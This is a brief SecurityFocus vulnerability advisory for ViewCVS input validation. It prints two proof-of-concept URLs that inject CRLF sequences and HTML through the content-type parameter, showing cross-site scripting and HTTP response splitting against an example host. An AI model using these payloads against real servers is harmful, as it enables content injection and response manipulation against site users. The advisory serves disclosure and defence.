ViewCVS Source View Input Validation Vulnerability

The following examples were submitted:

http://www.example.com/cgi-bin/viewcvs/project/source.file?rev=HEAD&content-type=text/html%0d%0a%0d%0a<html><body%20bgcolor="black"><
+font%20size=7%20color=red>XSS%20or%20HTTP%20Response%20Splitting</font></html>

http://www.example.com/cgi-bin/viewcvs/*checkout*/project/source.file?rev=1.0&content-type=text/html%0d%0aContent-Length:1937%0d%0a%0
+d%0aHi


 

Privacy Statement
Copyright 2010, SecurityFocus